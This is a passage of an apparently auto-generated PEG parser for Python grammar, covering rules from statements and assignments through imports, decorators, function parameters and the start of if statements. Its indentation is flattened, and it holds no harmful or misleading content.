mark = self._mark()
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def statements(self) -> Optional[list]:
# statements: statement+
mark = self._mark()
if (
(a := self._loop1_3())
):
return list ( itertools . chain ( * a ) )
self._reset(mark)
return None
@memoize
def statement(self) -> Optional[list]:
# statement: compound_stmt | simple_stmts
mark = self._mark()
if (
(a := self.compound_stmt())
):
return [a]
self._reset(mark)
if (
(a := self.simple_stmts())
):
return a
self._reset(mark)
return None
@memoize
def statement_newline(self) -> Optional[list]:
# statement_newline: compound_stmt NEWLINE | simple_stmts | NEWLINE | $
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.compound_stmt())
and
(_newline := self.expect('NEWLINE'))
):
return [a]
self._reset(mark)
if (
(simple_stmts := self.simple_stmts())
):
return simple_stmts
self._reset(mark)
if (
(_newline := self.expect('NEWLINE'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return [ast . Pass ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
self._reset(mark)
if (
(_endmarker := self.expect('ENDMARKER'))
):
return None
self._reset(mark)
return None
@memoize
def simple_stmts(self) -> Optional[list]:
# simple_stmts: simple_stmt !';' NEWLINE | ';'.simple_stmt+ ';'? NEWLINE
mark = self._mark()
if (
(a := self.simple_stmt())
and
self.negative_lookahead(self.expect, ';')
and
(_newline := self.expect('NEWLINE'))
):
return [a]
self._reset(mark)
if (
(a := self._gather_4())
and
(opt := self.expect(';'),)
and
(_newline := self.expect('NEWLINE'))
):
return a
self._reset(mark)
return None
@memoize
def simple_stmt(self) -> Optional[Any]:
# simple_stmt: assignment | star_expressions | &'return' return_stmt | &('import' | 'from') import_stmt | &'raise' raise_stmt | 'pass' | &'del' del_stmt | &'yield' yield_stmt | &'assert' assert_stmt | 'break' | 'continue' | &'global' global_stmt | &'nonlocal' nonlocal_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(assignment := self.assignment())
):
return assignment
self._reset(mark)
if (
(e := self.star_expressions())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Expr ( value = e , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'return')
and
(return_stmt := self.return_stmt())
):
return return_stmt
self._reset(mark)
if (
self.positive_lookahead(self._tmp_6, )
and
(import_stmt := self.import_stmt())
):
return import_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'raise')
and
(raise_stmt := self.raise_stmt())
):
return raise_stmt
self._reset(mark)
if (
(literal := self.expect('pass'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Pass ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'del')
and
(del_stmt := self.del_stmt())
):
return del_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'yield')
and
(yield_stmt := self.yield_stmt())
):
return yield_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'assert')
and
(assert_stmt := self.assert_stmt())
):
return assert_stmt
self._reset(mark)
if (
(literal := self.expect('break'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Break ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('continue'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Continue ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'global')
and
(global_stmt := self.global_stmt())
):
return global_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'nonlocal')
and
(nonlocal_stmt := self.nonlocal_stmt())
):
return nonlocal_stmt
self._reset(mark)
return None
@memoize
def compound_stmt(self) -> Optional[Any]:
# compound_stmt: &('def' | '@' | 'async') function_def | &'if' if_stmt | &('class' | '@') class_def | &('with' | 'async') with_stmt | &('for' | 'async') for_stmt | &'try' try_stmt | &'while' while_stmt | match_stmt
mark = self._mark()
if (
self.positive_lookahead(self._tmp_7, )
and
(function_def := self.function_def())
):
return function_def
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'if')
and
(if_stmt := self.if_stmt())
):
return if_stmt
self._reset(mark)
if (
self.positive_lookahead(self._tmp_8, )
and
(class_def := self.class_def())
):
return class_def
self._reset(mark)
if (
self.positive_lookahead(self._tmp_9, )
and
(with_stmt := self.with_stmt())
):
return with_stmt
self._reset(mark)
if (
self.positive_lookahead(self._tmp_10, )
and
(for_stmt := self.for_stmt())
):
return for_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'try')
and
(try_stmt := self.try_stmt())
):
return try_stmt
self._reset(mark)
if (
self.positive_lookahead(self.expect, 'while')
and
(while_stmt := self.while_stmt())
):
return while_stmt
self._reset(mark)
if (
(match_stmt := self.match_stmt())
):
return match_stmt
self._reset(mark)
return None
@memoize
def assignment(self) -> Optional[Any]:
# assignment: NAME ':' expression ['=' annotated_rhs] | ('(' single_target ')' | single_subscript_attribute_target) ':' expression ['=' annotated_rhs] | '{' ','.NAME+ '}' '=' expression | ((star_targets '='))+ (yield_expr | star_expressions) !'=' TYPE_COMMENT? | single_target augassign ~ (yield_expr | star_expressions) | invalid_assignment
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
and
(literal := self.expect(':'))
and
(b := self.expression())
and
(c := self._tmp_11(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 6 ) , "Variable annotation syntax is" , ast . AnnAssign ( target = ast . Name ( id = a . string , ctx = Store , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] , ) , annotation = b , value = c , simple = 1 , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
self._reset(mark)
if (
(a := self._tmp_12())
and
(literal := self.expect(':'))
and
(b := self.expression())
and
(c := self._tmp_13(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 6 ) , "Variable annotation syntax is" , ast . AnnAssign ( target = a , annotation = b , value = c , simple = 0 , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(a := self._gather_14())
and
(literal_1 := self.expect('}'))
and
(literal_2 := self.expect('='))
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . unpack_mapping ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self._loop1_16())
and
(b := self._tmp_17())
and
self.negative_lookahead(self.expect, '=')
and
(tc := self.type_comment(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Assign ( targets = a , value = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
cut = False
if (
(a := self.single_target())
and
(b := self.augassign())
and
(cut := True)
and
(c := self._tmp_18())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . AugAssign ( target = a , op = b , value = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if cut: return None
if (
(invalid_assignment := self.invalid_assignment())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def annotated_rhs(self) -> Optional[Any]:
# annotated_rhs: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def augassign(self) -> Optional[Any]:
# augassign: '+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' | '<<=' | '>>=' | '**=' | '//='
mark = self._mark()
if (
(literal := self.expect('+='))
):
return ast . Add ( )
self._reset(mark)
if (
(literal := self.expect('-='))
):
return ast . Sub ( )
self._reset(mark)
if (
(literal := self.expect('*='))
):
return ast . Mult ( )
self._reset(mark)
if (
(literal := self.expect('@='))
):
return self . check_version ( ( 3 , 5 ) , "The '@' operator is" , ast . MatMult ( ) )
self._reset(mark)
if (
(literal := self.expect('/='))
):
return ast . Div ( )
self._reset(mark)
if (
(literal := self.expect('%='))
):
return ast . Mod ( )
self._reset(mark)
if (
(literal := self.expect('&='))
):
return ast . BitAnd ( )
self._reset(mark)
if (
(literal := self.expect('|='))
):
return ast . BitOr ( )
self._reset(mark)
if (
(literal := self.expect('^='))
):
return ast . BitXor ( )
self._reset(mark)
if (
(literal := self.expect('<<='))
):
return ast . LShift ( )
self._reset(mark)
if (
(literal := self.expect('>>='))
):
return ast . RShift ( )
self._reset(mark)
if (
(literal := self.expect('**='))
):
return ast . Pow ( )
self._reset(mark)
if (
(literal := self.expect('//='))
):
return ast . FloorDiv ( )
self._reset(mark)
return None
@memoize
def return_stmt(self) -> Optional[ast . Return]:
# return_stmt: 'return' star_expressions?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('return'))
and
(a := self.star_expressions(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Return ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def raise_stmt(self) -> Optional[ast . Raise]:
# raise_stmt: 'raise' expression ['from' expression] | 'raise'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('raise'))
and
(a := self.expression())
and
(b := self._tmp_19(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Raise ( exc = a , cause = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('raise'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Raise ( exc = None , cause = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def global_stmt(self) -> Optional[ast . Global]:
# global_stmt: 'global' ','.NAME+
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('global'))
and
(a := self._gather_20())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Global ( names = [n . string for n in a] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def nonlocal_stmt(self) -> Optional[ast . Nonlocal]:
# nonlocal_stmt: 'nonlocal' ','.NAME+
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('nonlocal'))
and
(a := self._gather_22())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Nonlocal ( names = [n . string for n in a] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def del_stmt(self) -> Optional[ast . Delete]:
# del_stmt: 'del' del_targets &(';' | NEWLINE) | invalid_del_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('del'))
and
(a := self.del_targets())
and
self.positive_lookahead(self._tmp_24, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Delete ( targets = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_del_stmt := self.invalid_del_stmt())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def yield_stmt(self) -> Optional[ast . Expr]:
# yield_stmt: yield_expr
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(y := self.yield_expr())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Expr ( value = y , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def assert_stmt(self) -> Optional[ast . Assert]:
# assert_stmt: 'assert' expression [',' expression]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('assert'))
and
(a := self.expression())
and
(b := self._tmp_25(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Assert ( test = a , msg = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def import_stmt(self) -> Optional[ast . Import]:
# import_stmt: import_name | import_from
mark = self._mark()
if (
(import_name := self.import_name())
):
return import_name
self._reset(mark)
if (
(import_from := self.import_from())
):
return import_from
self._reset(mark)
return None
@memoize
def import_name(self) -> Optional[ast . Import]:
# import_name: 'import' dotted_as_names
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('import'))
and
(a := self.dotted_as_names())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Import ( names = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def import_from(self) -> Optional[ast . ImportFrom]:
# import_from: 'from' (('.' | '...'))* dotted_name 'import' import_from_targets | 'from' (('.' | '...'))+ 'import' import_from_targets
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('from'))
and
(a := self._loop0_26(),)
and
(b := self.dotted_name())
and
(literal_1 := self.expect('import'))
and
(c := self.import_from_targets())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ImportFrom ( module = b , names = c , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('from'))
and
(a := self._loop1_27())
and
(literal_1 := self.expect('import'))
and
(b := self.import_from_targets())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ImportFrom ( names = b , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . ImportFrom ( module = None , names = b , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def import_from_targets(self) -> Optional[List [ast . alias]]:
# import_from_targets: '(' import_from_as_names ','? ')' | import_from_as_names !',' | '*' | invalid_import_from_targets
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('('))
and
(a := self.import_from_as_names())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
return a
self._reset(mark)
if (
(import_from_as_names := self.import_from_as_names())
and
self.negative_lookahead(self.expect, ',')
):
return import_from_as_names
self._reset(mark)
if (
(literal := self.expect('*'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return [ast . alias ( name = "*" , asname = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
self._reset(mark)
if (
(invalid_import_from_targets := self.invalid_import_from_targets())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def import_from_as_names(self) -> Optional[List [ast . alias]]:
# import_from_as_names: ','.import_from_as_name+
mark = self._mark()
if (
(a := self._gather_28())
):
return a
self._reset(mark)
return None
@memoize
def import_from_as_name(self) -> Optional[ast . alias]:
# import_from_as_name: NAME ['as' NAME]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
and
(b := self._tmp_30(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . alias ( name = a . string , asname = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def dotted_as_names(self) -> Optional[List [ast . alias]]:
# dotted_as_names: ','.dotted_as_name+
mark = self._mark()
if (
(a := self._gather_31())
):
return a
self._reset(mark)
return None
@memoize
def dotted_as_name(self) -> Optional[ast . alias]:
# dotted_as_name: dotted_name ['as' NAME]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.dotted_name())
and
(b := self._tmp_33(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . alias ( name = a , asname = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize_left_rec
def dotted_name(self) -> Optional[str]:
# dotted_name: dotted_name '.' NAME | NAME
mark = self._mark()
if (
(a := self.dotted_name())
and
(literal := self.expect('.'))
and
(b := self.name())
):
return a + "." + b . string
self._reset(mark)
if (
(a := self.name())
):
return a . string
self._reset(mark)
return None
@memoize
def block(self) -> Optional[list]:
# block: NEWLINE INDENT statements DEDENT | simple_stmts | invalid_block
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
and
(a := self.statements())
and
(_dedent := self.expect('DEDENT'))
):
return a
self._reset(mark)
if (
(simple_stmts := self.simple_stmts())
):
return simple_stmts
self._reset(mark)
if (
(invalid_block := self.invalid_block())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def decorators(self) -> Optional[Any]:
# decorators: decorator+
mark = self._mark()
if (
(_loop1_34 := self._loop1_34())
):
return _loop1_34
self._reset(mark)
return None
@memoize
def decorator(self) -> Optional[Any]:
# decorator: ('@' dec_maybe_call NEWLINE) | ('@' named_expression NEWLINE)
mark = self._mark()
if (
(a := self._tmp_35())
):
return a
self._reset(mark)
if (
(a := self._tmp_36())
):
return self . check_version ( ( 3 , 9 ) , "Generic decorator are" , a )
self._reset(mark)
return None
@memoize
def dec_maybe_call(self) -> Optional[Any]:
# dec_maybe_call: dec_primary '(' arguments? ')' | dec_primary
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(dn := self.dec_primary())
and
(literal := self.expect('('))
and
(z := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = dn , args = z [0] if z else [] , keywords = z [1] if z else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(dec_primary := self.dec_primary())
):
return dec_primary
self._reset(mark)
return None
@memoize_left_rec
def dec_primary(self) -> Optional[Any]:
# dec_primary: dec_primary '.' NAME | NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.dec_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def class_def(self) -> Optional[ast . ClassDef]:
# class_def: decorators class_def_raw | class_def_raw
mark = self._mark()
if (
(a := self.decorators())
and
(b := self.class_def_raw())
):
return self . set_decorators ( b , a )
self._reset(mark)
if (
(class_def_raw := self.class_def_raw())
):
return class_def_raw
self._reset(mark)
return None
@memoize
def class_def_raw(self) -> Optional[ast . ClassDef]:
# class_def_raw: invalid_class_def_raw | 'class' NAME ['(' arguments? ')'] &&':' block
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_class_def_raw := self.invalid_class_def_raw())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('class'))
and
(a := self.name())
and
(b := self._tmp_37(),)
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(c := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ClassDef ( a . string , bases = b [0] if b else [] , keywords = b [1] if b else [] , body = c , decorator_list = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
return None
@memoize
def function_def(self) -> Optional[Union [ast . FunctionDef , ast . AsyncFunctionDef]]:
# function_def: decorators function_def_raw | function_def_raw
mark = self._mark()
if (
(d := self.decorators())
and
(f := self.function_def_raw())
):
return self . set_decorators ( f , d )
self._reset(mark)
if (
(f := self.function_def_raw())
):
return self . set_decorators ( f , [] )
self._reset(mark)
return None
@memoize
def function_def_raw(self) -> Optional[Union [ast . FunctionDef , ast . AsyncFunctionDef]]:
# function_def_raw: invalid_def_raw | 'def' NAME '(' params? ')' ['->' expression] &&':' func_type_comment? block | 'async' 'def' NAME '(' params? ')' ['->' expression] &&':' func_type_comment? block
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_def_raw := self.invalid_def_raw())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('def'))
and
(n := self.name())
and
(literal_1 := self.expect('('))
and
(params := self.params(),)
and
(literal_2 := self.expect(')'))
and
(a := self._tmp_38(),)
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(tc := self.func_type_comment(),)
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . FunctionDef ( name = n . string , args = params or self . make_arguments ( None , [] , None , [] , None ) , returns = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(literal := self.expect('async'))
and
(literal_1 := self.expect('def'))
and
(n := self.name())
and
(literal_2 := self.expect('('))
and
(params := self.params(),)
and
(literal_3 := self.expect(')'))
and
(a := self._tmp_39(),)
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(tc := self.func_type_comment(),)
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "Async functions are" , ast . AsyncFunctionDef ( name = n . string , args = params or self . make_arguments ( None , [] , None , [] , None ) , returns = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
self._reset(mark)
return None
@memoize
def params(self) -> Optional[Any]:
# params: invalid_parameters | parameters
mark = self._mark()
if (
(invalid_parameters := self.invalid_parameters())
):
return None # pragma: no cover
self._reset(mark)
if (
(parameters := self.parameters())
):
return parameters
self._reset(mark)
return None
@memoize
def parameters(self) -> Optional[ast . arguments]:
# parameters: slash_no_default param_no_default* param_with_default* star_etc? | slash_with_default param_with_default* star_etc? | param_no_default+ param_with_default* star_etc? | param_with_default+ star_etc? | star_etc
mark = self._mark()
if (
(a := self.slash_no_default())
and
(b := self._loop0_40(),)
and
(c := self._loop0_41(),)
and
(d := self.star_etc(),)
):
return self . check_version ( ( 3 , 8 ) , "Positional only arguments are" , self . make_arguments ( a , [] , b , c , d ) )
self._reset(mark)
if (
(a := self.slash_with_default())
and
(b := self._loop0_42(),)
and
(c := self.star_etc(),)
):
return self . check_version ( ( 3 , 8 ) , "Positional only arguments are" , self . make_arguments ( None , a , None , b , c ) , )
self._reset(mark)
if (
(a := self._loop1_43())
and
(b := self._loop0_44(),)
and
(c := self.star_etc(),)
):
return self . make_arguments ( None , [] , a , b , c )
self._reset(mark)
if (
(a := self._loop1_45())
and
(b := self.star_etc(),)
):
return self . make_arguments ( None , [] , None , a , b )
self._reset(mark)
if (
(a := self.star_etc())
):
return self . make_arguments ( None , [] , None , None , a )
self._reset(mark)
return None
@memoize
def slash_no_default(self) -> Optional[List [Tuple [ast . arg , None]]]:
# slash_no_default: param_no_default+ '/' ',' | param_no_default+ '/' &')'
mark = self._mark()
if (
(a := self._loop1_46())
and
(literal := self.expect('/'))
and
(literal_1 := self.expect(','))
):
return [( p , None ) for p in a]
self._reset(mark)
if (
(a := self._loop1_47())
and
(literal := self.expect('/'))
and
self.positive_lookahead(self.expect, ')')
):
return [( p , None ) for p in a]
self._reset(mark)
return None
@memoize
def slash_with_default(self) -> Optional[List [Tuple [ast . arg , Any]]]:
# slash_with_default: param_no_default* param_with_default+ '/' ',' | param_no_default* param_with_default+ '/' &')'
mark = self._mark()
if (
(a := self._loop0_48(),)
and
(b := self._loop1_49())
and
(literal := self.expect('/'))
and
(literal_1 := self.expect(','))
):
return ( [( p , None ) for p in a] if a else [] ) + b
self._reset(mark)
if (
(a := self._loop0_50(),)
and
(b := self._loop1_51())
and
(literal := self.expect('/'))
and
self.positive_lookahead(self.expect, ')')
):
return ( [( p , None ) for p in a] if a else [] ) + b
self._reset(mark)
return None
@memoize
def star_etc(self) -> Optional[Tuple [Optional [ast . arg] , List [Tuple [ast . arg , Any]] , Optional [ast . arg]]]:
# star_etc: '*' param_no_default param_maybe_default* kwds? | '*' ',' param_maybe_default+ kwds? | kwds | invalid_star_etc
mark = self._mark()
if (
(literal := self.expect('*'))
and
(a := self.param_no_default())
and
(b := self._loop0_52(),)
and
(c := self.kwds(),)
):
return ( a , b , c )
self._reset(mark)
if (
(literal := self.expect('*'))
and
(literal_1 := self.expect(','))
and
(b := self._loop1_53())
and
(c := self.kwds(),)
):
return ( None , b , c )
self._reset(mark)
if (
(a := self.kwds())
):
return ( None , [] , a )
self._reset(mark)
if (
(invalid_star_etc := self.invalid_star_etc())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def kwds(self) -> Optional[Any]:
# kwds: '**' param_no_default
mark = self._mark()
if (
(literal := self.expect('**'))
and
(a := self.param_no_default())
):
return a
self._reset(mark)
return None
@memoize
def param_no_default(self) -> Optional[ast . arg]:
# param_no_default: param ',' TYPE_COMMENT? | param TYPE_COMMENT? &')'
mark = self._mark()
if (
(a := self.param())
and
(literal := self.expect(','))
and
(tc := self.type_comment(),)
):
return self . set_arg_type_comment ( a , tc )
self._reset(mark)
if (
(a := self.param())
and
(tc := self.type_comment(),)
and
self.positive_lookahead(self.expect, ')')
):
return self . set_arg_type_comment ( a , tc )
self._reset(mark)
return None
@memoize
def param_with_default(self) -> Optional[Tuple [ast . arg , Any]]:
# param_with_default: param default ',' TYPE_COMMENT? | param default TYPE_COMMENT? &')'
mark = self._mark()
if (
(a := self.param())
and
(c := self.default())
and
(literal := self.expect(','))
and
(tc := self.type_comment(),)
):
return ( self . set_arg_type_comment ( a , tc ) , c )
self._reset(mark)
if (
(a := self.param())
and
(c := self.default())
and
(tc := self.type_comment(),)
and
self.positive_lookahead(self.expect, ')')
):
return ( self . set_arg_type_comment ( a , tc ) , c )
self._reset(mark)
return None
@memoize
def param_maybe_default(self) -> Optional[Tuple [ast . arg , Any]]:
# param_maybe_default: param default? ',' TYPE_COMMENT? | param default? TYPE_COMMENT? &')'
mark = self._mark()
if (
(a := self.param())
and
(c := self.default(),)
and
(literal := self.expect(','))
and
(tc := self.type_comment(),)
):
return ( self . set_arg_type_comment ( a , tc ) , c )
self._reset(mark)
if (
(a := self.param())
and
(c := self.default(),)
and
(tc := self.type_comment(),)
and
self.positive_lookahead(self.expect, ')')
):
return ( self . set_arg_type_comment ( a , tc ) , c )
self._reset(mark)
return None
@memoize
def param(self) -> Optional[Any]:
# param: NAME annotation?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
and
(b := self.annotation(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . arg ( arg = a . string , annotation = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def annotation(self) -> Optional[Any]:
# annotation: ':' expression
mark = self._mark()
if (
(literal := self.expect(':'))
and
(a := self.expression())
):
return a
self._reset(mark)
return None
@memoize
def default(self) -> Optional[Any]:
# default: '=' expression
mark = self._mark()
if (
(literal := self.expect('='))
and
(a := self.expression())
):
return a
self._reset(mark)
return None
@memoize
def if_stmt(self) -> Optional[ast . If]:
# if_stmt: invalid_if_stmt | 'if' named_expression ':' block elif_stmt | 'if' named_expression ':' block else_block?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_if_stmt := self.invalid_if_stmt())
